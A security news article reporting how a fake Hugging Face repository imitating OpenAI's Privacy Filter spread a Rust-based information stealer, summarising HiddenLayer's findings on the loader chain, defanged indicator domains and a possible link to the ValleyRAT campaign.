A counterfeit repository on Hugging Face cleverly imitated OpenAI’s Privacy Filter, topping the platform’s trending list by distributing a Rust-based information stealer to Windows users. This project, named Open-OSS/privacy-filter, replicated the official description of OpenAI’s Privacy Filter, misleading users into downloading it. Hugging Face has since removed access to the malicious repository.
Deceptive Repository Tactics
OpenAI introduced the Privacy Filter in April 2026 to identify and redact personal information in text, enhancing privacy and security features in applications. The fraudulent repository closely mimicked OpenAI’s legitimate offering, even copying the model card description. A report by HiddenLayer revealed that the repository’s loader.py file executed an infostealer malware on Windows devices.
The malicious project instructed users to clone the repository and run a batch file (“start.bat”) on Windows or a Python script (“loader.py”) on other systems. This setup installed dependencies and initiated the model, but also triggered malicious code that bypassed SSL verification and decoded a URL from JSON Keeper, a public JSON service, for executing commands via PowerShell. This mechanism allowed attackers to alter payloads without modifying the repository.
Complex Malware Operations
Using PowerShell, the malware downloaded a secondary batch script from a remote server, “api.eth-fastscan[.]org”, which elevated privileges, excluded itself from antivirus scans, and scheduled tasks to run additional scripts. While these tasks were temporary, they served as a launch point for the information stealer, which took screenshots, collected data from Discord, cryptocurrency wallets, and extracted browser information.
The malware also employed techniques to evade detection, such as checking for debuggers and sandboxes, and disabling Windows security features. The stolen data was transmitted in JSON format to “recargapopular[.]com”. Before being taken down, the repository had amassed about 244,000 downloads, with its popularity likely artificially inflated to deceive users.
Broader Cybersecurity Implications
Further investigation uncovered six additional repositories using a similar Python loader to distribute the malware. The domain “api[.]eth-fastscan[.]org” was found delivering a different Windows executable that connected to a command-and-control server used in prior malicious campaigns.
The attack highlights a new vector for deploying the ValleyRAT trojan, previously linked to phishing and SEO poisoning, and attributed to the Chinese group Silver Fox. HiddenLayer suggests these activities could be interconnected, pointing to a larger supply chain attack targeting open-source platforms.
This incident underscores the importance of vigilance in downloading software from trusted sources and the ongoing need for robust cybersecurity measures to protect against evolving threats.
